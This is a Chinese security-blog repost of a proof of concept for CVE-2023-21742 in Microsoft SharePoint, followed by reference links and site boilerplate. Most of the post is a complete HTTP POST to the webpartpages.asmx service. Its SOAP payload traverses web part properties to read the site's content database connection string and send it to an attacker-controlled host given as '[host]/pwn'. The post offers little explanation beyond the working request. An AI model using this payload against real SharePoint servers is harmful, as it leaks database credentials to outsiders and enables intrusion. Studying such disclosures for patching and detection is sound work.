CVE-2023-21742 POC

admin
admin
admin
102340
文章
87
评论
2023年4月12日01:36:41评论111 views字数 2037阅读6分47秒阅读模式

CVE-2023-21742

概念验证

注意:泄漏属性/属性只是一个 PoC,而不是 RCE EXP。

POST /_vti_bin/webpartpages.asmx HTTP/1.1 Host: splab13 SOAPAction: http://microsoft.com/sharepoint/webpartpages/ConvertWebPartFormat Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Connection: keep-alive Content-Type: text/xml; charset=utf-8 Content-Length: 1733 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ConvertWebPartFormat xmlns="http://microsoft.com/sharepoint/webpartpages"><inputFormat><![CDATA[ <%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPages" Assembly="Microsoft.SharePoint, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@ Register TagPrefix="att" Namespace="Microsoft.SharePoint.WebControls" Assembly="Microsoft.SharePoint, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <WebPartPages:WebPartZone id="id00" runat="server"> <ZoneTemplate> <WebPartPages:XsltListFormWebPart id="id01" runat="server"> <XmlDefinitionLink>http://webdb.com/aaaa</XmlDefinitionLink> <DataSources> <att:SoapDataSource runat="server" SelectUrl="http://[host]/pwn"> <SelectCommand> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <leakeddata>{leak}</leakeddata> </soap:Body> </soap:Envelope> </SelectCommand> <SelectParameters> <WebPartPages:DataFormParameter Name="leak" PropertyName="Parent.Controls[1].Controls[0].Web.Site.ContentDatabase.DatabaseConnectionString" DefaultValue="NULL"/> </SelectParameters> </att:SoapDataSource> </DataSources> </WebPartPages:XsltListFormWebPart> <att:TemplateContainer runat="server" id="f01" /> </ZoneTemplate> </WebPartPages:WebPartZone> ]]></inputFormat></ConvertWebPartFormat></soap:Body></soap:Envelope>
 

参考

  • https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-sharepoint-webpart-property-traversal-cve-2022- 38053-cve-2023-21742-bc6931698a5f
  • https://nvd.nist.gov/vuln/detail/CVE-2023-21742

原文始发于微信公众号(Ots安全):CVE-2023-21742 POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月12日01:36:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-21742 POChttps://cn-sec.com/archives/1666847.html

发表评论

匿名网友 填写信息